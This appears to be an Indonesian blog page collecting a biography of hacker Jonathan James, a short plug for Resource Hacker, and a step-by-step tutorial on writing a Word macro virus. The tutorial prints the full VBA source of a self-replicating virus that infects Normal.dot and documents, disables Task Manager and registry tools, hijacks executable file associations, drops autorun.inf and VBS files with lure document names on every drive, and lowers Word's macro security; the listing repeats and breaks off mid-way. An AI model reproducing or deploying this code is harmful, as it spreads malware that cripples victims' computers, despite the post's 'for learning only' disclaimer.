JONATHAN JAMES (Masuk dalam jajaran Hacker terhebat dunia)

James yang nama lengkapnya joseph jonathan james lahir di Miami florida 12 Desember 1983 merupakan hacker yang sangat muda.Saat usia16 tahun harus masuk penjara dengan apa yang dia lakukan dengan dunia hacker yang dia geluti. Hacker yang dia lakukan adalah menginstal backdoor ke server Badan Pengurangan Ancaman Pertahanan. DTRA merupakan lembaga Departemen Pertahanan dibebankan dengan mengurangi ancaman terhadap AS dan sekutunya dari senjata nuklir, biologi, kimia, konvensional dan khusus. backdoor ia ciptakan memungkinkan dia untuk melihat email sensitif dan menangkap karyawan username dan password. ia telah memasang backdoor tidak sah dalam server komputer di Dulles, Virginia, yang digunakan untuk menginstal sebuah sniffer yang membuatnya untuk mencegat lebih dari tiga ribu pesan lewat ke dan dari karyawan DTRA, bersama dengan banyak username dan password karyawan DTRA. James juga masuk ke dalam komputer NASA, mencuri software bernilai sekitar $ 1,7 juta. Menurut Departemen Kehakiman, “didukung perangkat lunak Lingkungan fisik Stasiun Luar Angkasa Internasional, termasuk pengaturan suhu dan kelembaban .NASA dipaksa untuk mematikan sistem komputer, akhirnya racking biaya $ 41.000. James menjelaskan bahwa ia download kode untuk melengkapi studi tentang pemrograman C, tapi berpendapat, “Kode itu sendiri jelek. Tentu tidak layak $ 1.700.000 seperti mereka mengklaim.”

PENANGKAPAN JAMES
Rumah James digerebek sekitar 06:00 pada pagi hari 26 Januari 2000, oleh agen dari Departemen Pertahanan, NASA dan polisi setempat. James secara resmi  dijatuhi hukuman tahanan rumah enam bulan dan masa percobaan, dan diwajibkan untuk menulis surat permintaan maaf kepada NASA dan Departemen Pertahanan. Dia juga dilarang menggunakan komputer untuk tujuan rekreasi hacker.Namun,James kemudian melanggar masa percobaan bahwa ketika ia dites positif untuk penggunaan narkoba dan yang kemudian ditahan oleh Amerika Serikat Marshall Layanan dan diterbangkan ke Alabama federal. Namun, enam bulan di penjara atas pelanggaran dia memperoleh pembebasan bersyarat. James menegaskan bahwa dia jera dan mungkin memulai sebuah perusahaan keamanan komputer.




KEMATIAN JONATHAN JAMES
Pada tahun 2007, departemen rantai toko TJX adalah korban dari gangguan sistem komputer besar yang dikompromikan informasi pribadi dan kredit dari jutaan pelanggan. Lingkaran hacker juga berkomitmen gangguan di BJ Wholesale Club, Boston Market, Barnes & Noble, Sports Authority, Forever 21, DSW, OfficeMax, dan Dave & Buster, dan dilaporkan membuat jutawan keluar diduga sebagai pemimpin kelompok itu yaitu  Albert Gonzalez. Meskipun ia menyangkal tidak melakukan apa-apa, James – yang berteman dengan beberapa hacker yang terlibat – diselidiki oleh Secret Service, yang menggerebek rumah james. Meskipun mereka ternyata tidak menemukan ada koneksi ke gangguan itu, mereka menemukan sebuah senjata api secara sah terdaftar dan catatan yang menunjukkan ia menganggap dirinya membunuh dirinya sendiri.  ayah James ‘kemudian mengatakan bahwa anaknya telah rentan terhadap depresi. Pengaduan kriminal diajukan terhadap hacker TJX yang bertentangan menyebutkan sebuah konspirator, tambahan yang tidak disebutkan namanya yang tidak didakwa, yang diidentifikasi hanya dengan inisial “JJ”. Pada tahun 2004, co-konspirator ini membantu  salah satu  para hacker untuk mencuri nomor kartu kredit, nomor rekening, dan PIN encryped dari sebuah toko OfficeMax via Wi-Fi. Angka-angka ini kemudian diduga diberikan kepada Albert Gonzalez, untuk siapa “JJ” juga membuka maildrop.
Pada tanggal 18 Mei 2008, Jonathan James ditemukan tewas dari luka tembak . bunuh diri-Nya tampaknya didorong oleh keyakinan bahwa dia akan dituntut atas kejahatan yang tidak dia lakukan”Saya jujur, jujur tidak ada hubungannya dengan TJX,” tulis James dalam catatan bunuh diri, “Saya tidak punya sistem ‘keadilan’ Mungkin tindakan saya. Hari ini, dan surat ini, akan mengirim pesan kuat kepada publik. Disisi lain, aku telah kehilangan kontrol atas situasi ini, dan ini adalah satu-satunya cara saya untuk mendapatkan kembali kontrol. ”
Itulah sekelumit cerita tentang sang hacker muda jonathan james yang harus berakhir dalam kematian dalam usia yang sangat muda yaitu 24 tahun. Sebenarnya sangat disesalkan dengan umurnya yang sangat muda dan kehebatannya dalam dunia hacker. Seandainya setelah dipenjara dia diarahkan untuk kepentingan keilmuan. Mungkin sangat bermanfaat. Tapi itulah misteri hidup sang hacker. Kita tidak tahu apa yang dipikirkannya. Tapi kita perlu mengacungkan jempol atas kehebatan ilmu yang dia punya dalam usia yang sangat relatif muda. Selebihnya tergantung kita cara memandang perjalanan sang hacker.okey deh semoga artikel ini bermanfaat dan bisa menambah pengetahuan kita.

Read More >>

Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare :D yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.

Nah 3 itu merupakan pokok penting dari Resource Hacker.
Kita ketahui dan kita pikir ? jika kita bisa membuka source dari software, berarti kita bisa membuat software itu juga :D hehehe.
Berbanggala anda pada diri anda sendiri.
Ini saya kasih SnapShot nya

Gambar di atas, saya lagi mau membuka source dari PhotoScape.
Setelah saya buka, dan saya buka table dialog, maka saya dapat kode sama tampilan nya seperti apa ? lihat gambar di bawah ini.

Okay mantap bukan ?? :-bd
Wuzup dah hehe, bagi kalian yang mau atau berminat ?
Silakan di download di sini

Download dan buka langsung aja.
Pelajari sendiri bagaimana cara pakai nya, biar anda bisa menjadi seorang master :D hehe.

Read More >>

Pendahuluan
Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.
Cara Kerja
Virus komputer umumnya dapat merusak perangkat lunak komputer dan tidak dapat secara langsung merusak perangkat keras komputer tetapi dapat mengakibatkan kerusakan dengan cara memuat program yang memaksa over process ke perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori) menjadi berkurang secara signifikan. Hampir 95% virus komputer berbasis sistem operasi Windows. Sisanya menyerang Linux/GNU, Mac, FreeBSD, OS/2 IBM, dan Sun Operating System. Virus yang ganas akan merusak perangkat keras.
(Baca: ilmu dalam tutorial ini untuk pembelajaran bukan untuk disalahgunakan)
Ini adalah tutorial saya yang kesekian kalinya dan mudah-mudahan tutorial kali ini bermanfaat untuk kalian.
Kali ini saya akan membahas mengenai virus macro… (para virus maker diharap untuk tenang dulu!).
Pasti banyak bertanya kenapa kali ini membahas tentang cara membuat virus? Biasanya kan lebih sering membahas analisis virus atau antivirusnya itu….
Yah kali ini memang agak berbeda. Selain untuk mencari suasana baru, aku juga agak tertantang dengan artikel yang saya buat ini.
Sebelum aku membuat artikel ini, aku sengaja mencari-cari kelemahan dari antivirusku sendiri (baca:Morphost). Ternyata aku lebih tertarik untuk membuat virus macro untuk mencari celah antivirusku itu. Untuk membuat artikel ini memang butuh pengorbanan juga. Soalnya komputerku jadi terinfeksi oleh virusku sendiri. Haaahhh…..

Virus macro merupakan virus yang dibuat dalam bahasa pemrograman visual basic macro di Microsoft Office. Kita ambil contoh, virus macro Word.
CARA MEMBUAT VIRUS
  1. Buka Ms.Word (hanya contoh)
  2. buka tools > Macro> Visual Basic Editor

  • Akan muncul gambar di bawah

Lalu kita ketikkan source virus nya pada kotak putih diatas dan akan tampak gambar seperti dibawah ini.


Sekarang muncul pertanyaan! Source yang bagaimana yang harus diketik???
Tenang, aku dah siapkan kok sourcenya. Makan neh source code!
1
<span style="color: #ff0000;">This is my codes virus</span>
1
<span style="color: #ff0000;"></span>
1
<span style="color: #ff0000;">Macro Viruses</span>
1
<span style="color: #ff0000;">[Macroid]</span>
1
<span style="color: #ff0000;"></span>
1
<span style="color: #ff0000;">Hanya untuk pembelajaran</span>
1
<span style="color: #ff0000;">Private Sub Document_Close()</span>
1
<span style="color: #ff0000;">Dim AD, NT As Object</span>
1
<span style="color: #ff0000;">Dim isi As String</span>
1
<span style="color: #ff0000;">Set AD = ActiveDocument.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">Set NT = NormalTemplate.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">If AD.Name &lt;&gt; Macroid Then</span>
1
<span style="color: #ff0000;">AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines</span>
1
<span style="color: #ff0000;">AD.Name = Macroid</span>
1
<span style="color: #ff0000;">isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)</span>
1
<span style="color: #ff0000;">AD.CodeModule.AddFromString isi</span>
1
<span style="color: #ff0000;">ActiveDocument.Save</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If NT.Name &lt;&gt; Macroid Then</span>
1
<span style="color: #ff0000;">NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines</span>
1
<span style="color: #ff0000;">NT.Name = Macroid</span>
1
<span style="color: #ff0000;">isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)</span>
1
<span style="color: #ff0000;">NT.CodeModule.AddFromString isi</span>
1
<span style="color: #ff0000;">NormalTemplate.Save</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If InStr(ActiveDocument.Content, Macroid) = 0 Then</span>
1
<span style="color: #ff0000;">ActiveDocument.Content = [Macroid] &amp; vbCrLf &amp; ActiveDocument.Content &amp; vbCrLf &amp; vbCrLf &amp; vbCrLf &amp; [Macroid] by Morphic &amp; vbCrLf &amp; copyright(c) Medan Juli-2008</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">On Error Resume Next</span>
1
<span style="color: #ff0000;">Dim b As Object</span>
1
<span style="color: #ff0000;">Set b = CreateObject(Wscript.Shell)</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title, Browser Internet ini diambil alih oleh Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption, Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner, VM-Morphic</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText, Macroid-A. Eat this!!! Ha ha ha</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden, 2</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\, Tong Sampah Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\, Komputer Morphic</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\exefile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\comfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\txtfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\scrfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\batfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shell\, 0pen</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shellpen\, &amp;Open</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shellpen\command\, wscript.exe &amp; Environ$(windir) &amp; \avmc.vbs</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">On Error Resume Next</span>
1
<span style="color: #ff0000;">Dim rog As Integer</span>
1
<span style="color: #ff0000;">Dim atr, vbs, Tipu(10), Trik(10) As String</span>
1
<span style="color: #ff0000;">For a = 66 To 90</span>
1
<span style="color: #ff0000;">partisi = Chr$(a)</span>
1
<span style="color: #ff0000;">vbs = partisi &amp; :\auto.vbs</span>
1
<span style="color: #ff0000;">atr = partisi &amp; :\autorun.inf</span>
1
<span style="color: #ff0000;">Tipu(1) = partisi &amp; :\Soal SPMB 1995-2008.doc</span>
1
<span style="color: #ff0000;">Tipu(2) = partisi &amp; :\Kisah di balik HarryPotter.doc</span>
1
<span style="color: #ff0000;">Tipu(3) = partisi &amp; :\Titip File sebentar.doc</span>
1
<span style="color: #ff0000;">Tipu(4) = partisi &amp; :\jangan di baca.doc</span>
1
<span style="color: #ff0000;">Tipu(5) = partisi &amp; :\buku harian.doc</span>
1
<span style="color: #ff0000;">Tipu(6) = partisi &amp; :\cerita hangat.doc</span>
1
<span style="color: #ff0000;">Tipu(7) = partisi &amp; :\Punya Baim.doc</span>
1
<span style="color: #ff0000;">Tipu(8) = partisi &amp; :\Teka-teki yang baru.doc</span>
1
<span style="color: #ff0000;">Tipu(9) = partisi &amp; :\Kumpulan cerita lucu.doc</span>
1
<span style="color: #ff0000;">Tipu(10) = partisi &amp; :\Trik Sulap.doc</span>
1
<span style="color: #ff0000;">If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then</span>
1
<span style="color: #ff0000;">Randomize</span>
1
<span style="color: #ff0000;">rog = Int(10 * Rnd) + 1</span>
1
<span style="color: #ff0000;">Open Tipu(rog) For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, “”</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">Trik(1) = partisi &amp; :\Novel J.K.Rowling.doc</span>
1
<span style="color: #ff0000;">Trik(2) = partisi &amp; :\cerita cinta.doc</span>
1
<span style="color: #ff0000;">Trik(3) = partisi &amp; :\Ringkasan cerita HarryPotter.doc</span>
1
<span style="color: #ff0000;">Trik(4) = partisi &amp; :\Semua Cheat game DOTA.doc</span>
1
<span style="color: #ff0000;">Trik(5) = partisi &amp; :\Kumpulan Cheat game.doc</span>
1
<span style="color: #ff0000;">Trik(6) = partisi &amp; :\Cheat game RF.doc</span>
1
<span style="color: #ff0000;">Trik(7) = partisi &amp; :\Cheat game Ayo Dance.doc</span>
1
<span style="color: #ff0000;">Trik(8) = partisi &amp; :\Goosebumps.doc</span>
1
<span style="color: #ff0000;">Trik(9) = partisi &amp; :\FearStreet.doc</span>
1
<span style="color: #ff0000;">Trik(10) = partisi &amp; :\R.L.Stine.doc</span>
1
<span style="color: #ff0000;">If Dir(Trik(1)) = “” And Dir(Trik(2)) = “” And Dir(Trik(3)) = “” And Dir(Trik(4)) = “” And Dir(Trik(5)) = “” And Dir(Trik(6)) = “” And Dir(Trik(7)) = “” And Dir(Trik(8)) = “” And Dir(Trik(9)) = “” And Dir(Trik(10)) = “” Then</span>
1
<span style="color: #ff0000;">Randomize</span>
1
<span style="color: #ff0000;">rogi = Int(10 * Rnd) + 1</span>
1
<span style="color: #ff0000;">Open Trik(rogi) For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, “”</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">Open atr For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, [Autorun]</span>
1
<span style="color: #ff0000;">Print #1, shell\Open\command=wscript.exe auto.vbs</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">SetAttr atr, vbHidden + vbSystem</span>
1
<span style="color: #ff0000;">Open vbs For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, dim a</span>
1
<span style="color: #ff0000;">Print #1, set a = createobject( &amp; Chr(34) &amp; Wscript.shell &amp; Chr(34) &amp; )</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\10.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\11.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Print #1, a.regwrite &amp; Chr(34) &amp; HKCU\Software\Microsoft\Office\12.0\Word\Security\Level &amp; Chr(34) &amp; , &amp; Chr(34) &amp; 1 &amp; Chr(34) &amp; , &amp; Chr(34) &amp; REG_DWORD &amp; Chr(34)</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">SetAttr vbs, vbHidden + vbSystem</span>
1
<span style="color: #ff0000;">Next a</span>
1
<span style="color: #ff0000;">If Dir(Environ$(windir) &amp; \Macroid.doc) = “” Then</span>
1
<span style="color: #ff0000;">Dim isicrita As String</span>
1
<span style="color: #ff0000;">isicrita = [Macroid] by Morphic &amp; vbCrLf &amp; Copyright(c) Medan Juli-2008 &amp; vbCrLf &amp; vbCrLf &amp; _</span>
1
<span style="color: #ff0000;">Chr(34) &amp; Ms.Word is a thing that can be used as a power to break everything. &amp; Chr(34) &amp; vbCrLf &amp; (Morphic)</span>
1
<span style="color: #ff0000;">Open Environ$(windir) &amp; \Macroid.doc For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, isicrita</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If Dir(Environ$(windir) &amp; \avmc.vbs) = “” Then</span>
1
<span style="color: #ff0000;">Open Environ$(windir) &amp; \avmc.vbs For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, set fs = createobject( &amp; Chr(34) &amp; Scripting.FileSystemObject &amp; Chr(34) &amp; )</span>
1
<span style="color: #ff0000;">Print #1, for each FD in fs.drives</span>
1
<span style="color: #ff0000;">Print #1, if (FD.Drivetype = 1) and FD.Path &lt;&gt; &amp; Chr(34) &amp; A: &amp; Chr(34) &amp; then</span>
1
<span style="color: #ff0000;">Print #1, set tf = fs.CreateTextFile(FD.Path &amp; Chr(38) &amp; Chr(34) &amp; \Jangan di baca.doc &amp; Chr(34) &amp; )</span>
1
<span style="color: #ff0000;">Print #1, end if</span>
1
<span style="color: #ff0000;">Print #1, Next</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">ActiveDocument.Save</span>
1
<span style="color: #ff0000;">NormalTemplate.Save</span>
1
<span style="color: #ff0000;">End Sub</span>
1
<span style="color: #ff0000;">Private Sub Document_Open()</span>
1
<span style="color: #ff0000;">CommandBars(Tools).Controls(Macro).Visible = False</span>
1
<span style="color: #ff0000;">CommandBars(Tools).Controls(Macro).Enabled = False</span>
1
<span style="color: #ff0000;">CommandBars(Tools).Controls(Customize…”).Visible = False</span>
1
<span style="color: #ff0000;">CommandBars(Tools).Controls(Options…”).Visible = False</span>
1
<span style="color: #ff0000;">Dim AD, NT As Object</span>
1
<span style="color: #ff0000;">Dim isi As String</span>
1
<span style="color: #ff0000;">Set AD = ActiveDocument.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">Set NT = NormalTemplate.VBProject.VBComponents.Item(1)</span>
1
<span style="color: #ff0000;">If AD.Name &lt;&gt; Macroid Then</span>
1
<span style="color: #ff0000;">AD.CodeModule.DeleteLines 1, AD.CodeModule.CountOfLines</span>
1
<span style="color: #ff0000;">AD.Name = Macroid</span>
1
<span style="color: #ff0000;">isi = NT.CodeModule.Lines(1, NT.CodeModule.CountOfLines)</span>
1
<span style="color: #ff0000;">AD.CodeModule.AddFromString isi</span>
1
<span style="color: #ff0000;">ActiveDocument.Save</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If NT.Name &lt;&gt; Macroid Then</span>
1
<span style="color: #ff0000;">NT.CodeModule.DeleteLines 1, NT.CodeModule.CountOfLines</span>
1
<span style="color: #ff0000;">NT.Name = Macroid</span>
1
<span style="color: #ff0000;">isi = AD.CodeModule.Lines(1, AD.CodeModule.CountOfLines)</span>
1
<span style="color: #ff0000;">NT.CodeModule.AddFromString isi</span>
1
<span style="color: #ff0000;">NormalTemplate.Save</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">If InStr(ActiveDocument.Content, Macroid) = 0 Then</span>
1
<span style="color: #ff0000;">ActiveDocument.Content = [Macroid] &amp; vbCrLf &amp; ActiveDocument.Content &amp; vbCrLf &amp; vbCrLf &amp; vbCrLf &amp; [Macroid] by Morphic &amp; vbCrLf &amp; copyright(c) Medan Juli-2008</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">On Error Resume Next</span>
1
<span style="color: #ff0000;">Dim b As Object</span>
1
<span style="color: #ff0000;">Set b = CreateObject(Wscript.Shell)</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title, Browser Internet ini diambil alih oleh Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption, Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner, VM-Morphic</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText, Macroid-A. Eat this!!! Ha ha ha</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden, 2</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt, 1</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\, Tong Sampah Macroid</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\, Komputer Morphic</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\exefile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\comfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\vbsfile\shell\edit\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\txtfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\scrfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\batfile\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shell\, 0pen</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shellpen\, &amp;Open</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\Folder\shellpen\command\, wscript.exe &amp; Environ$(windir) &amp; \avmc.vbs</span>
1
<span style="color: #ff0000;">b.regwrite HKLM\SOFTWARE\Classes\VisualBasic.Project\shell\open\command\, Winword.exe &amp; Environ$(windir) &amp; \Macroid.doc</span>
1
<span style="color: #ff0000;">On Error Resume Next</span>
1
<span style="color: #ff0000;">Dim rog As Integer</span>
1
<span style="color: #ff0000;">Dim atr, vbs, Tipu(10), Trik(10) As String</span>
1
<span style="color: #ff0000;">For a = 66 To 90</span>
1
<span style="color: #ff0000;">partisi = Chr$(a)</span>
1
<span style="color: #ff0000;">vbs = partisi &amp; :\auto.vbs</span>
1
<span style="color: #ff0000;">atr = partisi &amp; :\autorun.inf</span>
1
<span style="color: #ff0000;">Tipu(1) = partisi &amp; :\Soal SPMB 1995-2008.doc</span>
1
<span style="color: #ff0000;">Tipu(2) = partisi &amp; :\Kisah di balik HarryPotter.doc</span>
1
<span style="color: #ff0000;">Tipu(3) = partisi &amp; :\Titip File sebentar.doc</span>
1
<span style="color: #ff0000;">Tipu(4) = partisi &amp; :\jangan di baca.doc</span>
1
<span style="color: #ff0000;">Tipu(5) = partisi &amp; :\buku harian.doc</span>
1
<span style="color: #ff0000;">Tipu(6) = partisi &amp; :\cerita hangat.doc</span>
1
<span style="color: #ff0000;">Tipu(7) = partisi &amp; :\Punya Baim.doc</span>
1
<span style="color: #ff0000;">Tipu(8) = partisi &amp; :\Teka-teki yang baru.doc</span>
1
<span style="color: #ff0000;">Tipu(9) = partisi &amp; :\Kumpulan cerita lucu.doc</span>
1
<span style="color: #ff0000;">Tipu(10) = partisi &amp; :\Trik Sulap.doc</span>
1
<span style="color: #ff0000;">If Dir(Tipu(1)) = “” And Dir(Tipu(2)) = “” And Dir(Tipu(3)) = “” And Dir(Tipu(4)) = “” And Dir(Tipu(5)) = “” And Dir(Tipu(6)) = “” And Dir(Tipu(7)) = “” And Dir(Tipu(8)) = “” And Dir(Tipu(9)) = “” And Dir(Tipu(10)) = “” Then</span>
1
<span style="color: #ff0000;">Randomize</span>
1
<span style="color: #ff0000;">rog = Int(10 * Rnd) + 1</span>
1
<span style="color: #ff0000;">Open Tipu(rog) For Output As #1</span>
1
<span style="color: #ff0000;">Print #1, “”</span>
1
<span style="color: #ff0000;">Close #1</span>
1
<span style="color: #ff0000;">End If</span>
1
<span style="color: #ff0000;">Trik(1) = partisi &amp; :\Novel J.K.Rowling.doc</span>
1
<span style="color: #ff0000;">Trik(2) = partisi &amp; :\cerita cinta.doc</span>
1
<span style="color: #ff0000;">Trik(3) = partisi &amp; :\Ringkasan cerita HarryPotter.doc</span>
1
<span style="color: #ff0000;">Trik(4) = partisi &amp; :\Semua Cheat game DOTA.doc</span>
1
<span style="color: #ff0000;">Trik(5) = partisi &amp; :\Kumpulan Cheat game.doc</span>
1
<span style="color: #ff0000;">Trik(6) = partisi &amp; :\Cheat game RF.doc</span>
1
